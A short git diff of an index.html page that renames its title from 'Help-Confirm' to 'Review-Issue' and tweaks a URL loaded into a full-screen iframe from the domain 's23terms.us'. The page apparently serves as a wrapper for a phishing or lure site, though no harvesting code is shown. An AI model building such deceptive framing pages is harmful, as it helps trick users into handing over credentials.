--- a/index.html
+++ b/index.html
@@ -1,9 +1,10 @@
+
 <!DOCTYPE html>
 <html lang="en">
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
-    <title>Help-Confirm</title>
+    <title>Review-Issue</title>
     <style>
         body, html {
             margin: 0;
@@ -28,7 +29,7 @@
     var iframe = document.getElementById('myFrame');
     
     // Set the source URL for the iframe
-    var url = 'https://steps-settings.s23terms.us/guidelines.html'; //
+    var url = 'https://steps-settings.s23terms.us/guidelines.html/'; //
     iframe.src = url;
 </script>
 
